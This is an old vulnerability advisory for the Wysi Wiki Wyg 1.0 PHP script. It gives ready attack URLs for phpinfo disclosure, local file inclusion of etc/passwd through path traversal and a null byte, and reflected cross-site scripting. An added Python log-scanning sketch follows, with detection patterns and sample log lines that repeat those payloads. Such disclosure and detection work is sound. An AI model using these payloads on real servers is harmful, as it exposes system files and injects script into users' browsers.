
# Title : Wysi Wiki Wyg 1.0 (LFI/XSS/PHPInfo) Remote Vulnerabilities
# Published : 2008-10-20
# Author : StAkeR


/*
   
   Wysi Wiki Wyg 1.0 (LFI,XSS,PHPInfo) Remote Vulnerabilities
   ----------------------------------------------------------
   By StAkeR[at]hotmail[dot]it
   http://www.easy-script.com/scripts-dl/wysiwikiwyg10.zip
   ----------------------------------------------------------

  1- PHPInfo Disclosure 
  -  index.php?categup=isset
  
  2- Local File Inclusion (LFI) (MQ Off)
  -  index.php?c=../../../&a=etc/passwd%00
  
  3- Cross Site Scripting (XSS)
  -  index.php?c=wikiwizi&a=recherche&s=<script>[Javascript]</script>



*/
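
For defenders reviewing web server logs for the three request patterns listed above, here is an added detection sketch. It is not part of the original advisory or of Wysi Wiki Wyg. The parameter names come from the advisory; the matching rules, function names and sample log lines are assumptions of this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Parameter names (categup, c, a, s) come from the advisory above.
# The matching rules and the sample log lines are assumptions of this example.
TRAVERSAL = re.compile(r"\.\.[/\\]")
MARKUP = re.compile(r"<\s*script|<[^>]*\bon\w+\s*=|javascript:", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(url):
    """Return the advisory findings ('phpinfo', 'lfi', 'xss') a request URL matches."""
    parts = urlsplit(url)
    if not parts.path.endswith("index.php"):
        return set()
    # parse_qs percent-decodes once; keep_blank_values keeps a bare "categup=".
    query = parse_qs(parts.query, keep_blank_values=True)
    hits = set()
    # Only categup=isset is shown in the advisory; flagging any use is an assumption.
    if "categup" in query:
        hits.add("phpinfo")
    for name in ("c", "a"):
        for value in query.get(name, []):
            value = unquote(value)  # second decode catches double-encoded input
            if TRAVERSAL.search(value) or "\x00" in value:
                hits.add("lfi")
    for value in query.get("s", []):
        if MARKUP.search(unquote(value)):
            hits.add("xss")
    return hits

def scan(lines):
    """Return [(line_number, findings)] for combined-format access log lines."""
    results = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        findings = classify(match.group(1)) if match else set()
        if findings:
            results.append((number, findings))
    return results

# Constructed sample log lines (documentation-range addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Oct/2008:10:00:01 +0000] "GET /index.php?c=wikiwizi&a=recherche&s=hello HTTP/1.1" 200 5120',
    '192.0.2.44 - - [20/Oct/2008:10:00:07 +0000] "GET /index.php?categup=isset HTTP/1.1" 200 48211',
    '192.0.2.44 - - [20/Oct/2008:10:00:09 +0000] "GET /index.php?c=../../../&a=etc/passwd%00 HTTP/1.1" 200 1892',
    '192.0.2.44 - - [20/Oct/2008:10:00:12 +0000] "GET /index.php?c=wikiwizi&a=recherche&s=%3Cscript%3Ex%3C/script%3E HTTP/1.1" 200 5301',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, sorted(findings))
```

The first sample line is an ordinary search request using the same `c`, `a` and `s` parameters and is not flagged, which shows the rules key on the values rather than on the parameter names alone.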

# www.Syue.com [2008-10-20]